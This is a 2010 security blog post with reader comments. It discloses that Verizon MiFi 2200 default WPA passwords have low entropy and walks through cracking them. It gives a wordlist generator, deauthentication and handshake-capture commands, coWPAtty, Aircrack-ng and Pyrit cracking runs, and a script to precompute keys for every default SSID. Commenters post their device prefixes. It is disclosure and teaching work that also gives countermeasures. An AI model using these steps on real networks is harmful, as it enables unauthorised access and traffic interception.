
Verizon MiFi Device Hacked

by Joshua Wright, February 3, 2010, 5:11 pm


Verizon MiFi 2200 – A Marvel of Engineering

Recently, I picked up a Verizon MiFi device for $50 and the extension of my service contract for another 2 years. The fun that I’ve had with the device so far has well made up for both costs.

Background

The MiFi is a battery-powered 802.11b/g AP slightly smaller than an iPhone that features an integrated EV-DO uplink. This device replaced my former USB EV-DO WAN card*, allowing me to share the EV-DO connectivity with multiple devices over WiFi. It’s been immensely useful since I commonly travel with 3 laptops, not to mention additional mobile devices.

Verizon – We Never Miss an Opportunity to Market

From a security perspective, the MiFi device uses a unique WPA pre-shared key (PSK) for authentication with the TKIP cipher for encryption. It’s unclear why the device doesn’t use WPA2-PSK authentication with the AES-CCMP cipher; perhaps it was a security trade-off by the manufacturer to maintain the greatest possible compatibility with legacy devices that only support WPA-PSK/TKIP.

On the reverse side of the MiFi is a label identifying the default SSID and PSK used for authentication. Besides the obvious marketing angle Verizon gets from including its name in the SSID, this allows the user to quickly identify and connect to their personal WiFi network to leverage the EV-DO uplink.

Reconnaissance

Like any good hacker, I turn to the tools that I know to be tried and true. Kismet is a powerful assessment and evaluation tool for wireless networks, providing additional insight into the MiFi wireless LAN interface.

Kismet – It’s Like Fate, or Something

Cursory analysis of the beacon information elements doesn’t reveal anything particularly interesting, though the Kismet screenshot gives us a point of correlation. The MiFi SSID on my product is “Verizon MiFi DAD1 Secure”, slightly different than that of the MiFi device label (where Kismet reports the addition of “ Secure” to the SSID, and the mixed-case “MiFi”, which is important to us).

Also, we can see that the “DAD1” in the SSID matches the last two bytes of the AP’s MAC address (or Basic Service Set Identifier - BSSID). From this we can determine that Verizon has no more than 65,536 unique SSID’s for MiFi devices (potentially less; more data is needed to determine if all 16 bits of the BSSID are evenly distributed among devices).

The password on the back of the MiFi device also reveals some interesting information. From the photo above, the password on my MiFi device is:

09 11 19 00891

This password value likely breaks down into four fields:

Manufacture Year: “09” represents the 2-character year of manufacture.

Manufacture Month: “11” represents the 2-character month code.

Manufacture Day?: “19” represents the 2-character day code (NB: This could be wrong, one sample had a value of “34” here, need more data).

Sequential Identifier: “00891” represents the 5-character sequential identifier code.

Based on this assessment, we can determine that the password selection for the MiFi default is weak. Instead of 11 numeric values with an effective entropy of approximately 36 bits, the MiFi password only has an effective entropy of less than 17 bits for a given 6-byte prefix. If the concept of a manufacture date-stamp is true for the 6-byte prefix, then we have a relatively small search space to find the default MiFi PSK.

Exploitation

Knowing that for a given 6-byte password prefix there are only 100,000 possible passwords, we can get down to exploiting a given MiFi device. We don’t know how many 6-byte prefixes are in use, but that’s where YOU THE READER come in. Please let me know what prefixes you see on your individual devices, and I’ll add them to the attack set.

Talking amongst my wonderful colleagues at InGuardians, I was able to identify 4 unique manufacture prefixes. Assuming the target device is one of these values, we can quickly build a dictionary to attack the PSK selection with a small Python script and a tool such as coWPAtty or Aircrack-ng:

#!/usr/bin/env python
import sys

# remove executable name
sys.argv.pop(0)
if len(sys.argv) == 0:
    print "Must specify the 6-digit manufacture date (e.g. '091119')."
    sys.exit(1)

# for every prefix given on the command line, emit all 100,000
# candidate passwords: prefix followed by a zero-padded 5-digit number
for arg in sys.argv:
    for i in xrange(0, 100000):
        print "%s%05d" % (arg, i)

You can download this source as mifi-passgen.py.

Running this script and redirecting it to a file (e.g. “./mifi-passgen.py 091118 091119 091120 091121 >mifi-wordlist.txt”) allows us to pass it to our favorite WPA cracking tool.

Once the wordlist is ready, we need to capture the WPA handshake for a given client. This is straightforward with Kismet, or a tool like Airodump-ng. In this example, I’ll use Airodump-ng and Aireplay-ng to fake a deauthenticate message, forcing the victim to disconnect and reconnect to the MiFi AP (because I’m an impatient attacker). First, I’ll start Airodump-ng:

root@bt:~# airmon-ng start wlan0 11

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)
wlan0mon        Atheros         ath5k - [phy0]

root@bt:~# airodump-ng --bssid 00:21:E8:B2:DA:D1 -w mifi-dad1 --channel 11 wlan0mon

Next, Aireplay-ng is used to deauthenticate a user. I send 5 deauth messages, just to make sure the target receives at least one:

root@bt:~# aireplay-ng --deauth 5 -a 00:21:E8:B2:DA:D1 wlan0mon
16:53:14  Waiting for beacon frame (BSSID: 00:21:E8:B2:DA:D1) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c ).
16:53:14  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]
16:53:14  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]
16:53:15  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]
16:53:15  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]
16:53:16  Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]

Returning to the Airodump-ng window, we can see that it has observed a WPA handshake, identifying the MAC address of the MiFi AP. Terminate the Airodump-ng session by issuing “CTRL+C”.

WPA Handshake – No Limp Fish

With the Airodump-ng packet capture file mifi-dad1-01.cap, and the dictionary file containing the potential passwords for the target MiFi device, we can implement the WPA/WPA2 brute-force dictionary attack using coWPAtty:

root@bt:~# cowpatty -r mifi-dad1-01.cap -f mifi-wordlist.txt -s "Verizon MiFi2200 DAD1 Secure"
cowpatty 4.6 - WPA-PSK dictionary attack.

Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack. Please be patient.

The PSK is "09111900891".

892 passphrases tested in 4.60 seconds: 193.97 passphrases/second

… or Aircrack-ng.

root@bt:~# aircrack-ng mifi-dad1-01.cap -w mifi-wordlist.txt


Key Found, Conveniently Enough

This is fun and evil and all, but we can get even more evil, can’t we?

Exploitation (with 100% more Evil)

We know that WPA/WPA2-PSK networks are vulnerable to offline dictionary attacks, despite the efforts of the IEEE 802.11 committee to thwart the attack by reducing the speed of password guessing. Manipulating this mechanism, tools such as coWPAtty’s “genpmk” and Aircrack-ng’s “Airolib-ng” spend up-front time precomputing all the possible key guesses in a dictionary file, accelerating the cracking time when the attack is implemented. A limiting factor in this precomputation attack is that all the password guesses need to be computed for each unique SSID.

Recall that the MiFi SSID is in the form “Verizon MiFi2200 ???? Secure”, where the SSID is the same for each device with the exception of the 4 ASCII characters representing the last 2 bytes of the wireless BSSID. With only 2 bytes difference between each SSID, there is a limit of 65,536 potential SSID’s.

Using the WPA/WPA2-PSK precomputation attack, we can precompute the password guesses based on the manufacture date and sequential identifier for each of the 65K SSID’s. Once this is precomputed, it becomes possible to recover the password for any default MiFi configuration in a matter of seconds.

Leveraging standard host CPU’s, it might take a long time to precompute all the password guesses for each of the 65K SSID’s. Fortunately, we aren’t constrained to the speed of common CPU’s.

While coWPAtty and Aircrack-ng made strides in improving the speed of attacking WPA/WPA2-PSK networks, they pale in comparison to the excellent work of Lukas Lueg and the Pyrit project. Pyrit leverages both the performance of standard CPU’s for precomputing password guesses for PSK networks, as well as the impressive computing power of video accelerators, including the Nvidia CUDA line.

If we assume there are 12 manufacture date prefixes, we are left with a password list of 1.2 million entries. Computing all the possible password hashes for each of the 65K SSID’s on a Core2Duo 2.5 GHz SSE2 would take almost two years to complete. Leveraging 4 GeForce 295 CUDA cards on a single host would require only 10.2 days.

With the database capabilities added to Pyrit, we can get this attack setup fairly easily. After installing Pyrit (getting the source from SVN and installing sqlalchemy described here), we need to configure Pyrit to use a database for storage. I’m using sqlite in this example by editing the ~/.pyrit/config file as shown:

#default_storage = file://
# Change this path to an appropriate one for your filesystem
default_storage = sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients =
rpc_server = true

Once the sqlite database storage reference is set, we can create all 65K MiFi SSID’s using a simple Python script:

#!/usr/bin/env python
import cpyrit.storage

# open the same sqlite storage referenced in ~/.pyrit/config
store = cpyrit.storage.getStorage('sqlite:///mifi-psk.db')

# one ESSID for every possible value of the last two BSSID bytes
for i in xrange(0, 256):
    for j in xrange(0, 256):
        essid = "Verizon MiFi2200 %02X%02X Secure" % (i, j)
        store.essids.create_essid(essid)
        print "Created %s" % essid

You can download this source as pyrit-mifi-ssids.py. Change to the directory path you established in the Pyrit config file, then create the SSID’s for Pyrit:

$ cd /Users/josh/hack/MiFi-PSK
$ ./pyrit-mifi-ssids.py
Created Verizon MiFi2200 0000 Secure
Created Verizon MiFi2200 0001 Secure
Created Verizon MiFi2200 0002 Secure
Created Verizon MiFi2200 0003 Secure
...
Created Verizon MiFi2200 FFFF Secure

Once the SSID’s have been loaded, we can load the passwords into the Pyrit database as well. Returning to the mifi-passgen.py script, we can pipe the output directly to Pyrit, as shown.

$ ./mifi-passgen.py 091118 091119 091120 091121 | pyrit -i - import_passwords
Pyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db'... connected.
400000 lines read. Flushing buffers.... ...
All done.

Next, we allow Pyrit to precompute the passphrase guesses for us, leveraging the available CPU and offload capabilities:

$ pyrit batch
Pyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db'... connected.
Working on ESSID 'Verizon MiFi2200 4109 Secure'
Processed 2/256 workunits so far (0.8%); 480 PMKs per second.
...

The great part is that this only needs to be done once. It could take days or weeks depending on your available hardware, but once it is complete, it can be used by anyone to recover the default password on any MiFi device.

To leverage the Pyrit database, we can use the “attack_db” option with our packet capture, as shown.

$ pyrit -r mifi-dad1-01.cap attack_db
Pyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:////Users/josh/hack/Mifi-PSK/mifi-psk.db'... connected.
Parsing file 'mifi-dad1-01.cap' (1/1)...
8816 packets (8816 802.11-packets), 1 APs

Picked AccessPoint 00:21:e8:b2:da:d1 ('Verizon MiFi2200 DAD1 Secure') automatically.
Attacking handshake with Station 00:1c:b3:b8:76:6c...
Tried 57504 PMKs so far (57.4%); 107722 PMKs per second..

The password is '09111900891'.

Impact

Using this technique, an attacker can recover the default password from any MiFi device. The impact of this attack can vary, but three immediate concerns come to mind:

Utilization Fees: Verizon limits users to 5 GB data transfer a month over EV-DO account; exceeding this watermark racks up significant fees for the end-user. A ne’er-do-well could compromise a MiFi device and leverage it for their download purposes, potentially avoiding racking up their own Internet use charges, or just to cause trouble for the victim.

Client Attack: For organizations deploying MiFi devices for their road-warriors, an attacker may compromise the PSK on the MiFi wireless interface for the opportunity to exploit the client devices using the network interface. This may be in an effort to gain access to a system over a weak network interface, allowing them to return to their more secure network to attack other internal hosts.

Traffic Decryption: If an attacker can identify the correct PSK for the MiFi network, then they can also decrypt all the traffic on the network with Wireshark or Airdecap-ng. This could be used to passively collect sensitive information, or to actively exploit the client browser or other network traffic.

Countermeasures

Fortunately, there are a couple of options available to us to mitigate this attack.

Change the Default PSK: Before deploying the MiFi device, be sure to change the PSK to a non-default value. The IEEE 802.11-2007 specification reads “A key generated from a passphrase of less than about 20 characters is unlikely to deter attacks.”; I think this is good advice.

Change the Default SSID: Change the default SSID from “Verizon MiFi2200 XXXX Secure” to another value that is not common, but not unique either (somewhere in the middle) to mitigate precomputed PSK attacks, as well as general wireless anonymity attacks.
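To put numbers on the entropy argument, the precomputation cost estimate and the SSID countermeasure, here is an added Python example (not code from the post, Pyrit or the other tools it mentions). It derives the WPA/WPA2 PMK the way IEEE 802.11i does (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations), reproduces the search-space figures above, and shows that a PMK table precomputed over the default “Verizon MiFi2200 XXXX Secure” names says nothing about the same passphrase under a renamed SSID; the PMK-per-second rates are assumptions back-derived from the post’s “almost two years” and “10.2 days” figures, and the custom SSID is a constructed sample.

```python
import hashlib
import math

# Default password layout described in the post: a 6-digit date-like
# prefix followed by a 5-digit sequential identifier ("09 11 19 00891").
SEQ_DIGITS = 5
TOTAL_DIGITS = 11

# The 4 hex characters in the default SSID are 2 BSSID bytes: 256 * 256 names.
DEFAULT_SSID_FORMAT = "Verizon MiFi2200 {:02X}{:02X} Secure"
DEFAULT_SSID_COUNT = 256 * 256

# Sizing figure from the post: 12 prefixes -> 1.2 million candidates.
PREFIXES_ASSUMED = 12
SECONDS_PER_DAY = 86400
SECONDS_PER_YEAR = 365 * SECONDS_PER_DAY


def entropy_bits(candidates):
    """Effective entropy, in bits, of a value drawn uniformly from `candidates` options."""
    return math.log2(candidates)


def default_candidates(known_prefixes):
    """Guesses needed for a default PSK when only `known_prefixes` date prefixes are in use."""
    return known_prefixes * 10 ** SEQ_DIGITS


def pmk(passphrase, ssid):
    """IEEE 802.11i passphrase-to-PMK mapping: PBKDF2-HMAC-SHA1, SSID as the salt,
    4096 iterations, 256-bit output. The salt is why one PMK table serves one SSID only."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def default_ssid(bssid_byte4, bssid_byte5):
    """SSID a default MiFi would advertise for the given last two BSSID bytes."""
    return DEFAULT_SSID_FORMAT.format(bssid_byte4, bssid_byte5)


def table_build_seconds(candidates, ssid_count, pmks_per_second):
    """Wall-clock time to precompute every candidate PMK for every SSID in a table."""
    return candidates * ssid_count / pmks_per_second


def summary(passphrase="09111900891", custom_ssid="quietnet-7"):
    """Numbers behind the post's argument plus a PMK comparison across SSIDs.
    `custom_ssid` is a constructed example of a renamed network, not a real one."""
    candidates = default_candidates(PREFIXES_ASSUMED)
    default = default_ssid(0xDA, 0xD1)   # the post's own "DAD1" device
    return {
        "full_space_bits": entropy_bits(10 ** TOTAL_DIGITS),     # ~36.5
        "per_prefix_bits": entropy_bits(10 ** SEQ_DIGITS),       # ~16.6
        "candidates_12_prefixes": candidates,                    # 1,200,000
        # Assumed rates, back-derived from the post's "almost two years" on a
        # Core2Duo and "10.2 days" on 4 GeForce 295 cards (not measured here).
        "cpu_years": table_build_seconds(candidates, DEFAULT_SSID_COUNT, 1_247) / SECONDS_PER_YEAR,
        "gpu_days": table_build_seconds(candidates, DEFAULT_SSID_COUNT, 89_238) / SECONDS_PER_DAY,
        # Same passphrase, different salt: a table built for the default names misses entirely.
        "default_pmk_hex": pmk(passphrase, default).hex(),
        "custom_pmk_hex": pmk(passphrase, custom_ssid).hex(),
        "table_reusable_after_rename": pmk(passphrase, default) == pmk(passphrase, custom_ssid),
    }


if __name__ == "__main__":
    for key, value in summary().items():
        print(f"{key}: {value}")
```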

Enterprise organizations and end-users alike should apply both of these recommendations to thwart attacks against the MiFi deficiency in password selection, as well as weaknesses in WPA/WPA2-PSK in general.

Conclusion

The Verizon MiFi is a great tool, but the engineering team who created the default password mechanism should have taken into consideration the limited entropy in the selection of passwords, and the well-publicized attacks against WPA-PSK networks to limit customer exposure. Coincidentally, this is a topic we examine in my SANS Institute Ethical Hacking Wireless course, where we dig into a variety of wireless systems including WiFi, Bluetooth, WiMAX, GSM, proprietary protocols and more. If you are interested in wireless security topics, I recommend you check out the course sample or sign right up for the biggest SANS conference of the year in Orlando, FL, March 8th – 13th.

Joshua Wright is a SANS instructor and security consultant at InGuardians. This essay originally appeared on his blog, Will Hack For Sushi.

Comments (13)

1. Anonymous, February 3, 2010 @ 6:30 pm

The number is the ESN for the CDMA chip.

2. Anonymous, February 3, 2010 @ 7:06 pm

Ah, but aren’t the SSID’s just that by default, but completely user-settable? They are on the Sprint version; you can’t possibly tell the difference between my MiFi and a dozen other home routers you’ll find in my neighborhood.

3. Space Rogue, February 3, 2010 @ 7:07 pm

This hack was published like two weeks ago. Where have you been.

http://evilpacket.net/2010/jan/14/mifi-geopwn/

Conclusion reads like an Ad for your SANS course, makes me wonder why you stole this advisory in the first place.

- SR

4. Anonymous, February 3, 2010 @ 7:30 pm

pwnd^

5. Anonymous, February 3, 2010 @ 7:32 pm

6. Anonymous, February 3, 2010 @ 7:51 pm

Space Rogue: that’s a totally different attack, you fool…

Nice informative post! Especially the part about the entropy and CUDA.

7. Not Space Rogue, February 3, 2010 @ 9:22 pm

You are wrong. Try reading both. The evilpacket mifi geopwn attack is against the administration web application and exploits the combination of weak authentication and no CSRF protection. This is a network attack against the weak selection of preshared keys.

8. Anonymous, February 4, 2010 @ 5:32 pm

We just bought one a few days ago. My colleague who configured it tells me that it has WPA2 AES available.

9. Anonymous, February 4, 2010 @ 7:20 pm

Excellent article!

For your records, the 6-digit on my MiFi’s password is 091135.

10. Anonymous, February 4, 2010 @ 9:17 pm

The code is the ESN of the device, as noted by another commenter. The first three characters of the Decimal ESN are the Manufacturer’s code, assigned to Novatel. Thus you can assume the first three characters are always 091. The remaining 8 characters are a unique identifier for that handset within the given manufacturer range.

http://en.wikipedia.org/wiki/Electronic_Serial_Number

11. George Carey, February 5, 2010 @ 10:58 pm

My MIFI2200 supports WPA2-AES. That and a long passphrase makes it fairly safe.

Plus, it’s only Internet access. If you’re using it for corporate communications you probably have a VPN running on top of it. So the exposure would be limited to exploiting the client(s) only after obtaining the key.

12. ROCKYROAD, February 23, 2010 @ 5:14 am

last six pw on my 2200: 928204

13. rcmichelle, August 25, 2010 @ 2:49 am

you can try to google Password Genius

Comments are closed.
